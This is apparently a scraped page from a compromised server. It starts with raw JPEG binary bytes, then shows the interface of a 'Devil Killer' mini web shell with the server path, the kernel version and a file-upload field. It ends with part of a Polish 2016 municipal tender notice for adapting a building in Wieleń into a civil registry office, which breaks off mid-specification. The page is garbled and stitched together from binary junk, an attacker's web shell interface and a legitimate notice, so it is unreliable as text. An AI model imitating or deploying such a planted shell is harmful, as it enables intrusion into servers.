JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20161212/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20161212/364685-N-2016.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://www.bip.wielen.pl' target='_blank'>http://www.bip.wielen.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 364685 - 2016
              z dnia 2016-12-12 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Wieleń: Adaptacja budynku na potrzeby Urzędu Stanu Cywilnego w Wieleniu<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Roboty budowlane
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Gmina Wieleń, krajowy numer identyfikacyjny
              57079115800000, ul.
              ul. Kościuszki 
              34,
              64730  
              Wieleń, woj.
              wielkopolskie, państwo
              Polska, tel.
              (067) 2561170 w. 47, e-mail
              Wielen_UM@wokiss.pl, faks
              (067) 2561021.
              <br />
              Adres strony internetowej (URL): www.bip.wielen.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.bip.wielen.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />Ofertę należy złożyć w siedzibie Zamawiającego, tj. Urzędzie Miejskim w Wieleniu w Kancelarii (parter) stanowisko nr 1.<br />
                Adres:
                <br />Gmina Wieleń, ul. Kościuszki 34, 64-730 Wieleń</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Adaptacja budynku na potrzeby Urzędu Stanu Cywilnego w Wieleniu<br /><b>Numer referencyjny: </b>TI.371.18.2016<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                roboty budowlane
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Nie
                </div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>W zakres zamówienia wchodzą następujące roboty:
3.4.1	KONSTRUKCJA OBIEKTU
- ŁAWY FUNDAMENTOWE ISTNIEJĄCE
Nie dokonywano odkrywek, projektowany zakres robót nie powoduje zwiększenia obciążeń fundamentów.
- ŚCIANY KONSTRUKCYJNE ZEWNĘTRZNE I WEWNĘTRZNE  ISTNIEJĄCE
Murowane z cegły ceramicznej pełnej.
- WIĘŹBA DACHOWA ISTNIEJĄCA
Drewniana krokwiowa wsparta na dwóch ściankach stolcowych.
- NADPROŻA ISTNIEJĄCE I PROJEKTOWANE
Nad otworami  drzwiowymi i okiennymi nadproża istniejące łukowe ceglane, projektowane z kształtowników stalowych.  
- DACH
Dach wentylowany. Na istniejących krokwiach projektuje się położenie folii dyfuzyjnej, a następnie kontrłaty 20x60 mm, łaty 60x40 mm i pokrycie z blachy powlekanej dachówkowej.
3.4.2. OPIS ELEMENTÓW ARCHITEKTONICZNYCH I KONSTRUKCYJNYCH
- ŚCIANY WEWNĘTRZNE
Część ścian wewnętrznych podlega rozbiórce (zakres wyburzeń  pokazano na rys. nr 7.). 
Oddzielenie części rozbieranej muru od pozostającej wykonać przez cięcie.
W istniejących ścianach wewnętrznych projektuje się wykonanie trzech otworów drzwiowych oraz zamurowanie dwóch.
Zamurowania wykonać cegłą ceramiczną pełną kl15 na zaprawie cem.-wap. Rz 3 MPa z przewiązaniem.
Przy wykonywaniu nowych otworów drzwiowych należy wykonać przesklepienia- nadproża 
z belek stalowych walcowanych o przekrojach pokazanych na rzucie przyziemia (rys. nr 3 ). W tym celu należy wykuć bruzdę i osadzić w niej na warstwie zaprawy odpowiedni ceownik, po czym wykuć bruzdę z drugiej strony. Po osadzeniu belek i związaniu zaprawy wykonać otwór drzwiowy  przez wycięcie muru. Wykonanie otworów poprzedzić podstemplowaniem stropu, szczególnie w miejscu oparcia słupów konstrukcji dachowej.
Otwór drzwiowy do pomieszczenia archiwum umiejscowiony jest w ścianie kominowej.
Przed wykonaniem otworu należy ustalić przebieg kanałów i zapewnić właściwe oparcie belek nadproża (przewody w miejscach oparcia  należy zabetonować).
- ŚCIANKI WEWNĘTRZNE
Po wykonaniu określonych w projekcie rozbiórek ścianki wewnętrzne typu lekkiego w technologii ROCKWOOL lub równoważnej.
Ściana przy archiwum systemowa 3.40.06 o odporności ogniowej REI 60 (lub równoważne). 
Profile RIGIPS CW I UW 100 ULTRASTIL (lub równoważne), wełna mineralna lub skalna o gęstości minimum 30kg/m i grubości min. 100 mm, Płyty 2x GKF z obu stron.
Ściana przy sanitariacie typu lekkiego w technologii ROCKWOOL (lub równoważnej) oparta na profilach RIGIPS CW I UW 75 (lub równoważnych) wypełniona wełną mineralną lub skalną i obłożona płytami 2x GK i od wewnątrz 1xGKi 1 x GK HYDRO.
- KOMINY
Istniejące kominy od poziomu 20 cm poniżej stropu rozebrać, po oczyszczeniu z sadzy przewody zagruzować i zabetonować. Wykonać nową ścianę kominową z cegły.
Komin biegnący wzdłuż ściany wewnętrznej od poziomu strychu należy rozebrać i wykonać nowy  jednokanałowy.
Ponad dachem kominy wykonać z cegły ceramicznej pełnej i zakończyć czapą betonową                  z okapem. Otwory wylotowe zabezpieczyć siatką.
- SCHODY WEWNĘTRZNE
Schody konstrukcji drewnianej policzkowe. Schody należy zabezpieczyć p. poż.
Wejście na strych schodami strychowymi umiejscowionymi w pomieszczeniu biura- lokalizacja wejścia możliwie blisko ściany wewnętrznej. Zamknięcie otworu izolowane termicznie.
- IZOLACJE
IZOLACJE TERMICZNE I AKUSTYCZNE
- ściany zewnętrzne nadziemia ocieplić od wewnątrz materiałem termoizolacyjnym                                     o wsp. = 0,022 W/mK, gęstości objętościowej ok. 30kg/m3, posiadającym w sobie paraizolację np.  płytami EOROTHANE (lub równoważnymi) gr. 8cm + 9,5 mm płyta gipsowo- kartonowa, klejonymi systemowym klejem do ściany bez tynku, lub do tynku po sprawdzeniu jego stanu przyczepności. W miejscach, gdzie na ścianie przyklejane będą płytki glazurowane, mocowanie płyt wzmocnić mechanicznie. Płytą ocieplić również wnęki podokienne i ościeża oraz nadproża, płaszczyznę zewnętrzną wykończyć zgodnie z technologią układania tych płyt przez fugowanie i szpachlowanie. Płyty chronić przed zawilgoceniem i odkształceniem, dlatego należy składować palety z płytami w pomieszczeniu suchym w pozycji poziomej zgodnie z zaleceniami producenta.
- strop nad parterem ocieplony wełną mineralną dla stropów drewnianych na poddaszu  nieużytkowym  grubości 25 cm, po zdjęciu gliny i ślepego pułapu.
- posadzka na gruncie ocieplona styropianem twardym podłogowym EPS grubości 12 cm,
IZOLACJE PRZECIWWILGOCIOWE I PAROIZOLACJE
-  izolacja posadzki parteru 2 razy folia budowlana,
-  na stropie pod wełną mineralną folia budowlana,
-  w dachu paraizolacja z folii dyfuzyjnej,
- pod podestem i schodami 2 x papa asfaltowa na klejony zakład na zagruntowanym podłożu.
IZOLACJE WODOSZCZELNE
- w sanitariacie 2x folia PCV z wywinięciem na ściany 10 cm,
- pokrycie dachu blachodachówką,
 -  pod glazurą w obrębie umywalki i zlewozmywaka  na ścianach  ułożyć folię w płynie,
 - na zewnątrz na podeście i schodach 2x folia do stosowania na zewnątrz w płynie z wywinięciem na ścianę 15 cm.
3.4.3. ELEMENTY WYKOŃCZENIA WEWNĘTRZNEGO
POSADZKI I PODŁOŻA
- Rozebrać istniejące wykładziny i podłogi.
- We wszystkich pomieszczeniach i w korytarzu posadzka wg projektu aranżacji wnętrz  klejona do podłoża z gładzi cementowej.
- Na podeście przed wejściem i schody - podkład cementowy wykonać ze spadkiem 1,5 %  od budynku, posadzka z płyt granitowych gr 3 cm  klejonych do podłoża.
WYKOŃCZENIA  ŚCIAN
- na wszystkich  ścianach istniejących nieocieplanych- po zerwaniu tapet i skuciu luźnych fragmentów, tynk cem.- wap. naprawić i wykończyć gładzią gipsową, malowanie wodorozcieńczalnymi, akrylowymi farbami lateksowymi w kolorach bardzo jasnych odpowiednimi do malowania ścian w pomieszczeniach suchych, mokrych, narażonych na zabrudzenia,  za wyjątkiem pomieszczeń objętych projektem aranżacji wnętrz.
- na nowych, murowanych ścianach tynk cem.- wap. wykończony gładzią gipsową.
- na ścianach z płyt gipsowych wygładzenie spoin i malowanie zgodnie z technologią wykonywania tych ścian.
- w sanitariacie i pomieszczeniu socjalnym- na ścianach glazura wg projektu aranżacji wnętrz.
WYKOŃCZENIE SUFITÓW
-   zdjąć z sufitów istniejące płytki styropianowe i tynk na trzcinie.
-  wykonać nowe sufity podwieszane z płyt 2xGKF na systemowych rusztach mocowanych do belek stropowych.
-   w sali ślubów sufit wykonać wg projektu aranżacji wnętrz.
STOLARKA I ŚLUSARKA DRZWIOWA
- okna z profili ciepłego wysokoudarowego PCV wzmocnionych profilami stalowymi ocynkowanymi w kolorze białym, szklone potrójnie szybą zespoloną z wypełnieniem gazami szlachetnymi. Okno o współczynniku U 1,1 W/m2K wyposażone w okucia umożliwiające uchylanie, rozwieranie, rozszczelnianie oraz uniemożliwiające samozamykanie okien sterowane klamką. Nawiewniki montowane w górnej części ramy okiennej w pomieszczeniach nie klimatyzowanych wg projektu wentylacji.
- stolarka drzwiowa wewnętrzna płycinowa drewniana w ościeżnicach regulowanych. Drzwi do sanitariatu wyposażone w kratkę nawiewną.
- drzwi do archiwum i drzwi do pomieszczenia socjalnego o odporności  ogniowej EI30.
- drzwi wejściowe do budynku drewniane, płycinowe o współczynniku U 1,5 W/m2K w kolorze ceglastym, szklone potrójnie szkłem bezpiecznym i wyposażone w samozamykacz.  
Przed złożeniem zamówienia na stolarkę okienną i drzwiową wymiary pobrać z natury.
- okno w pomieszczeniu archiwum zabezpieczone kratą rolowaną. Krata pracująca w płaszczyźnie pionowej w prowadnicach bocznych i nawijana do skrzynki, zamontowana wewnątrz otworu. Okienka w profilu kraty mogą pozostać puste, lub być przeszklone. 
ŚLUSARKA I DROBNE ELEMENTY WYKOŃCZENIOWE
- w pomieszczeniach podstawowych i pomocniczych zamontować odboje drzwiowe w miejscu uniemożliwiającym obijanie klamki o ścianę, parapety wewnętrzne we wszystkich pomieszczeniach z wysokoudarowego PCV lub inne wg projektu aranżacji wnętrz.
3.4.4. WYKOŃCZENIE  ZEWNĘTRZNE
- wycieraczki - zewnątrz stalowa ażurowa, zatopiona w posadzce, wewnętrzna tekstylna umieszczona w zagłębieniu w posadzce- wymiary 60x90 cm.
-  uchwyty na flagi- podwójne po obu stronach wejścia.
- obróbki blacharskie na dachu, przy styku ze ścianami urzędu, okapach, oraz przy kominach z blachy powlekanej w kolorze blachodachówki.
- rynny d= 150 mm i rury spustowe d=120 mm zewnętrzne z blachy powlekanej w kolorze blachodachówki.
- wokół budynku wykonać opaskę betonową z polbruku ze spadkiem ok. 2% od budynku i  dowiązać się do istniejącej nawierzchni.
- istniejącą nawierzchnię z polbruku wokół schodów zdjętą na czas budowy odtworzyć profilując spadki od budynku.
- nad drzwiami wejściowymi zamontować daszek o konstrukcji stalowej kutej wg projektu  indywidualnego.
- balustrada przed wejściem i poręcz ze stali kutej wg projektu indywidualnego.
3.4.5. SCHODY ZEWNĘTRZNE
Po obrysie zewnętrznym schodów wykonać fundament na głębokość 80 cm pod poziomem docelowym terenu z betonu gr. 20 cm lub murowany z bloczków betonowych gr. 25 cm. Na dobrze ubitym i wyprofilowanym podłożu z grubego piasku zagęszczanego wodą i cementem wykonać płytę gr. 10 z chudego betonu i zaizolować ją 2x papą asfaltową na zagruntowanym podłożu. Następnie ułożyć płytę betonową (C16/20) grub. 15 cm z wyrobionymi spadkami na zewnątrz jak na rys. rzutu (nr 3) z uskokami pod stopnie. W obu warstwach betonu wykonać dylatacje wzdłuż styku z budynkiem i równolegle do spadków w pola nie większe jak 4,0 m2 i wypełnić je zaprawą elastyczną mrozoodporną. Wzdłuż budynku izolację z papy wywinąć na ścianę ok. 15 cm i wykończyć cokolikiem z płyty granitowej. Powierzchnię płyty betonowej wyprofilować i wygładzić, oczyścić z pyłu i zagruntować, a następnie pokryć powierzchnie poziome i pionowe dwukrotnie mrozoodporną, elastyczną folią izolacyjną w płynie. Na tak przygotowanym podłożu kleić płyty okładzinowe z granitu o nawierzchni szorstkiej płomieniowanej,  groszkowanej lub surowej gr. 3 cm. Klej rozprowadzać zębatą packą na całej powierzchni i dokładnie docisnąć, by nie powstały pęcherze powietrza. Na stopnicach wykonać również lekki spadek - różnica w poziomie ok 1,5-2 cm na stopniu. Powstałe szczeliny między płytami wypełnić silikonem lub elastyczną fugą w kolorze granitu. Wszystkie użyte materiały powinny być dopuszczone do  stosowania na zewnątrz, a kleje, uszczelniacze  i izolacje w płynie powinny dodatkowo być elastyczne.  Wymiary i poziomy sprawdzić w terenie, uwzględnić stopień zanikający ze względu na istniejący spadek terenu.
3.4.6 INSTALACJE SANITARNE
OPIS STANU ISTNIEJĄCEGO
W chwili obecnej działki nr ewid. 453, nr ewid. 454 i nr ewid. 455/4 położone w miejscowości Wieleń ul. Stanisława Staszica, na której projektuje się wykonanie robót budowlanych jest uzbrojona. Budynek zaopatrzony jest w media. Przyłącze wodociągowe i przyłącze kanalizacji sanitarnej do budynku urzędu istniejące. W budynku istniejąca instalacja centralnego ogrzewania jest źródłem ciepła które stanowi kotłowani na paliwo stałe w celu zabezpieczenia budynku w źródło ciepła istniejąca oraz istniejąca instalacja wod.- kan.
WEWNĘTRZNA INSTALACJA WODOCIĄGOWA - ZIMNA WODA
Wewnętrzna instalacja wodociągowa do powstających w wyniku zmiany sposobu użytkowania pomieszczeń tj. pomieszczenie socjalne i WC zaprojektowana będzie jako przebudowa instalacji istniejącej. Opomiarowanie zużycia wody zimnej dla przedmiotowych lokali Urzędu Stanu Cywilnego jako części urzędu nastąpi poprzez istniejący wodomierz. Zaprojektowano instalację zimnej wody użytkowej do celów sanitarnych. Przewody instalacji wodociągowych powinny spełniać warunki dotyczące wymagań ochronnych związanych z:
1.	ochronną przed wzrostem ciśnienia
2.	ochronną przed wtórnym zanieczyszczeniem wody
3.	ochronną przed wpływami termicznymi
4.	ochroną przed korozją
5.	ochronną przed hałasem i drganiami.
Woda zimna doprowadzona będzie do przyborów sanitarnych zamontowanych w pomieszczeniu socjalnym i WC zlokalizowanych na parterze budynku.
Punktami poboru wody będą:
1.	bateria zlewozmywakowa
2.	bateria umywalkowa
3.	płuczka zbiornikowa
4.	zawór ze złącznika
Instalacja wykonana będzie z rur stalowych ocynkowanych łączonych na gwint lub z rur polipropylenowych łączonych poprzez zgrzewanie polidyfuzyjne. Na przewodach wody zimnej wykonać izolację antyroszeniową, izolując je prefabrykami ze spienionego polietylenu (Termaflex). Przejścia przez przegrody budowlane wykonać w tulejach ochronnych.
Główne ciągi instalacji wody zimnej prowadzone będą ze spadkiem 2 % w kierunku urządzeń w celu uniemożliwienia odwodnienia instalacji. Przewody prowadzić w bruździe ściennej oraz w posadzce. Jakość wody musi odpowiadać warunkom Rozporządzenia Ministra Zdrowia i Opieki Społecznej z dnia 04.05.1990 r. Dz. U. nr 35 poz. 205.
Po wykonaniu robót montażowych należy wewnętrzną instalację wodociągową przepłukać z dodatkiem środka dezynfekującego, sprawdzając jej szczelność. Próbę szczelności wykonać na ciśnienie próbne równe 1,5 krotnej wartości ciśnienia roboczego 0,6 MPa. Próbę uważa się za pozytywną jeżeli manometr w ciągu 20 min nie wykazuje spadku ciśnienia. Instalację należy uznać za wyregulowaną i gotową do końcowego odbioru jeżeli przy wodzie zimnej woda wypływa z najwyżej położonych punktów oraz czas napełnienia płuczki zbiornikowej nie przekracza 2 min.
- WEWNĘTRZNA INSTALACJA WODOCIĄGOWA - CIEPŁA WODA
Ciepła woda użytkowa przygotowana będzie miejscowo za pomocą elektrycznego przepływowego podgrzewacza wody o mocy 3,5kW podumywalkowego w WC i podzlewozmywakowego w pomieszczeniu socjalnym. Instalacja wody ciepła wykonana będzie z rur stalowych ocynkowanych łączonych na gwint lub z rur polipropylenowych łączonych poprzez zgrzewanie polidyzfuzyjne.   Rury wody ciepłej należy prowadzić w bruzdach nad przewodami wody zimnej. Wszystkie materiały instalacyjne stykające się 	bezpośrednio z wodą powinny mieć świadectwo Państwowego Zakładu Higieny o dopuszczeniu kontaktu z wodą do picia oraz świadectwo o dopuszczeniu do stosowania w budownictwie. Po wykonaniu robót montażowych należy wewnętrzną instalację wodociągową przepłukać z dodatkiem środka dezynfekującego, sprawdzając jej szczelność. Próbę szczelności wykonać na ciśnieni próbne równe 1,5 krotnej wartości ciśnienia roboczego 0, 6 MPa. Próbę  uważa się za pozytywną, jeżeli manometr w ciągu 20 mon nie wykazuje spadku ciśnienia.
WEWNĘTRZNA INSTALACJA KANALIZACYJNA
Wewnętrzną instalację kanalizacyjną zaprojektowano z rur PCV typu N SDR 41 o złączach kielichowych z uszczelką gumową firmy Wavin Metalplast  Buk lub firmy Profil. Odbiornikiem ścieków gospodarczo- bytowych będzie istniejąca sieć miejska. Zaprojektowano następujące średnice: PCV śr. 50, PCV śr. 110, PCV śr. 160. Rozprowadzenie przewodów poziomych pod posadzką przyziemia, prowadzenie przewodów pionowych w bruzdach ściennych lub obudowane płytą kartonowo- gipsową z zakończeniem rurą wywiewną wyprowadzoną na poddasze ponad strop z zaworem napowietrznym.
Niedopuszczalne jest zamurowanie przewodów na stałe w ścianie lub w stropie.
W najwyższym punkcie kanalizacji sanitarnej rurę PCV śr. 110 można też wyprowadzić ponad dach i zamontować kominek wentylacyjny lub nie wyprowadzając na pionie zamontować zawór napowietrzająco- odpowietrzający typu HUNTER. Podejścia do przyborów wykonać wg normy PN-74/C-889200.
WEWNĘTRZNA INSTALACJA CENTRALNEGO OGRZEWANIA.
Przy obliczeniu strat ciepła dla przedmiotowych pomieszczeń uwzględniono współczynniki przenikania ciepła K wg obowiązujących norm. Obliczenia strat ciepła przeprowadzono zgodnie z obowiązującymi normami przy następujących założeniach:
- ogrzewanie bez przerw
- II strefa klimatyczna
Zaprojektowano przebudowę istniejącej instalacji centralnego ogrzewania, wodnej gdzie źródłem ciepła będzie istniejący w piwnicy pod budynkiem urzędu kocioł na paliwo stałe. Projektuje się zmianę usytuowania istniejących grzejników oraz zamontowanie grzejników stalowych płytowych konwektorowych, kompaktowych z wbudowanym zaworem termostatycznym oraz automatycznym odpowietrzeniem. Instalacje projektuje się z rozdziałem dolnym tj. rozprowadzenie w posadzce, rozdział ciepła do każdego grzejnika.
WEWNĘTRZNA INSTALACJA KLIMATYZACJI I WENTYLACJI
Przy obliczeniach nawiewu i wywiewu dla pomieszczeń uwzględniono współczynniki wymian powietrza dla poszczególnych pomieszczeń wg obowiązujących norm. Zastosowano nawiewniki nadokienne zamontowane w ramach okiennych jako np. żaluzje. W pomieszczeniu sali ślubów zastosować klimatyzator naścienny o mocy 6 kW zaś w pomieszczeniu biura zastosować klimatyzator naścienny o mocy 4 kW. Klimatyzatory zamontować w systemie multisplit z jednostką zewnętrzną naścienną o mocy 6,8 kW. Wentylacja wewnętrzna grawitacyjna rozwiązania jako wywiew w pionach wentylacyjnych z wyłączeniem WC, gdzie należy zastosować wentylację kanałową, gdzie kanałem z wentylatorem mechanicznym w trybie uruchomiania przy otwieraniu drzwi należy rozwiązać wywiew z pomieszczenia.
3.4.7. INSTALACJE ELEKTRYCZNE
ZASILANIE
